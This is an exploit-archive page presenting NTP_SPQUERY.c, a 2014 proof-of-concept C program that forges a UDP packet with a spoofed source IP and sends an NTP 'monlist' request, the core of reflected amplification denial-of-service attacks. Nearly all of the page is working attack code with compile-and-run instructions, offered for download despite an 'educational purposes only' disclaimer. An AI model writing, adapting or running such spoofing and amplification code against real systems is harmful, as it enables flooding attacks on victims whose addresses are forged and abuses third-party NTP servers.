exploit the possibilities

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept
Posted Mar 19, 2014
Authored by Mark Osborne

NTP_SPQUERY.C is a spoofed "monlist query" program which can generate packets like those used in reflected amplification NTP attacks that were common in early 2014. Written entirely in C, it requires no special libs or header files. It has been designed to run on most LINUXs.

tags | exploit, denial of service, spoof, proof of concept
MD5 | b1b7e74fd45bd5a336855af010521b6e

NTP Spoofed "monlist query" Denial Of Service Proof Of Concept

Change Mirror Download
//   PROGRAM :   NTP_SPQUERY.c
//
// AUTHOR : loud-fat-bloke / MARK OSBORNE
//
// Description:
//
// REFLECTED AMPLIFICATION NTP ATTACK
//
// A well known security journal has asked me to do a piece on NTP ddos
// and being a bit reactionary (OCD in other words)
// I figured I would show that NTP and DNS DrdOS are related and conform to a common formulae.
// Therefore I have used the DNS_SPQUERY program I wrote 6 months ago to convert into NTP_SQUERY with minimal changes
//
// NTP_SPQUERY.C is an "monlist query" REFLECTED AMPLIFICATION NTP ATTACK that are common in March 2014
//
//
// As part of the charity project
// "CyberAttack CyberCrime CyberWarfare Cyber-Complacency"
//
// I have tried to use a book, youtube presentations, in person lectures and Android Apps to Highlight three key cyber points :
// 1 - that in europe a cyber attack by any group of proficient computer literate parties could cripple the infrastructure
// 2 - that formalised cyber security monitoring is required to prevent this - not militaristic, counter espionage initiatives
// which are hang overs from the cold ware
// 3 - Privacy campaigners generaly make things work by assuming "cyber security" monitoring fits into this
// espionage initiatives describes above
//
// charity project? - proceeds from the book, the APPs and personal appearances go to medical charity for sepsis awareness
//
//
// **** DO NO HARM WITH THIS PROGRAM *********
//
// the author has produced it for educational purposes only
//
//
/* to build and run me cut and paste the below 10 lines into your shell on a nice LINUX box
# compile me
#
gcc ntp_spquery.c -o ntp_spquery
#
# run me
# SPOOFED_S_IP NTP SERVER TARGET
./ntp_spquery 192.168.0.121 192.168.0.120
#
#
#
#
*/
char *pretty= "\n ---------------------------------------------------------------------------------- \n";
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <syslog.h>
#include <netinet/in.h>
#include <stdio.h>
int udpsockfd,n;

#define PROGRAM "NTP_SPQUERY"


//NTP header structure
struct NTP_HEADER
{
unsigned short id; // identification number

unsigned char li :2; //
unsigned char vn :3; //
unsigned char rb :1; //
unsigned char eb :1; //
unsigned char mb :1; //
unsigned char opcode :5;
unsigned char data[10] ; //
};

/*
char *pretyy= "\n \n DNS_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
*/

char *pretyy= "\n \n NTP_SPQUERY - Amplification and Refelector \n\n from the book 'CyberAttack CyberCrime CyberWarefare Cyber-Complacency \n\n";
char *pretyz= " \tIs Hollywood's blueprint for Chaos coming true' by Mark Osborne\n \t ISBN-13: 978-1493581283 ISBN-10: 1493581287 \n\n";

unsigned char buf[4000];
int data_length ;

/*


# LeapIndicator = 0 , VersionNum = 3 or 2 , Mode = 3 (Client Mode)
#NTP v2 Monlist Request :
# data = "0x17,x00,x03,x2a,x00"
#NTP v3 Monlist Request :
# data = "0x1b,x00,x03,x2a,x00"
*/

// Define some constants.
#define IP4_HDRLEN 20 // IPv4 header length
#define UDP_HDRLEN 8 // UDP header length, excludes data

int
spoofudp (char *saddr,int sport, char *daddr, int dport, int datalen, char *udppacket)
{
int sd ;
const int on = 1;
struct ip iphdr, *iphdr_ptr;
struct udphdr udphdr, *udphdr_ptr;
unsigned char *data, *packet;
struct sockaddr_in sin;
unsigned char x[10000]; // the buffer
// Allocate memory for various headers and offsets.
packet = x ;
iphdr_ptr = x ;
// datalen = dnslength;
// UDP header ptr .
udphdr_ptr = (packet + IP4_HDRLEN);
// UDP data ptr .
data = (packet + IP4_HDRLEN + UDP_HDRLEN);
// UDP data -copy it at the end
memcpy (data , udppacket ,datalen );
// IPv4 header
iphdr_ptr->ip_hl =5;
iphdr_ptr->ip_v = 4;
iphdr_ptr->ip_tos = 0;
iphdr_ptr->ip_len = htons (IP4_HDRLEN + UDP_HDRLEN + datalen);
iphdr_ptr->ip_id = htons (0);
iphdr_ptr->ip_off = htons (0);
iphdr_ptr->ip_ttl = 255;
iphdr_ptr->ip_p = IPPROTO_UDP;
iphdr_ptr->ip_dst.s_addr = inet_addr (daddr );
iphdr_ptr->ip_src.s_addr = inet_addr (saddr ); /* SPOOOOPH di source IP */
iphdr_ptr->ip_sum = 0; //kernel do this please

// UDP header
udphdr_ptr->source = htons (sport);
udphdr_ptr->dest = htons (dport);
udphdr_ptr->len = htons (UDP_HDRLEN + datalen);
udphdr_ptr->check = 0; // hey misterkernal do your job for me
// zero ise sockeet data.
memset (&sin, 0, sizeof (struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr_ptr->ip_dst.s_addr;
// open a raw socket
if ((sd = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror ("socket() failed ");
exit (2);
}
// unless the socket is set with IP_HDRINCL a random IP datagram will go
// out on the wire nearly all Linux kernals allow many bsd sun aix and hp dont
if (setsockopt (sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) {
perror ("setsockopt() failed to set IP_HDRINCL ");
exit (3);
}
// Send packet.
if (sendto (sd, packet, IP4_HDRLEN + UDP_HDRLEN + datalen, 0, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0) {
perror ("sendto() failed ");
exit (EXIT_FAILURE);
}
// Close socket descriptor.
close (sd);
}


usage ()
{
fprintf(stderr,"Program Usage: \n %s SOURCE_DOT_ADDR DEST_DOT_ADDR \n\n", PROGRAM);
exit(1);
}

unsigned char out[1000];
int len1 = 0, len2 = 0 ,len3 = 0 ;
int pants;

int
main( int argc , char *argv[])
{
char *out_temp;
if ( argc != 3 )
usage();
/* */ printf(pretyy ) ;
/* */ printf(pretyz ) ;
printf(" Spoof Source ip: \t \t %s \n Dest ip: \t \t %s \n \n \n ", argv[1] ,
argv[2] );
//
memset(buf,0x00,0xfF);
sprintf(buf,"%c%c%c%c%c", 0x17,0x00,0x03,0x2a,0x00);

data_length = 9 ;
printf(pretty ) ;
//
//
// my pretty
for (pants=0; pants < 30 ; pants++ )
printf("%x ", buf[pants]);
//

printf("\nNTP PACKET len \t \t %i \n" , data_length ) ;
//
// Writes out a spoofed UDP Packet
// written for my rfc 2827 survey which never got finished
//
spoofudp (argv[1] ,4950, argv[2] , 123 , data_length, buf );

return 0;
}
Login or Register to add favorites

File Archive:

March 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    19 Files
  • 2
    Mar 2nd
    15 Files
  • 3
    Mar 3rd
    30 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close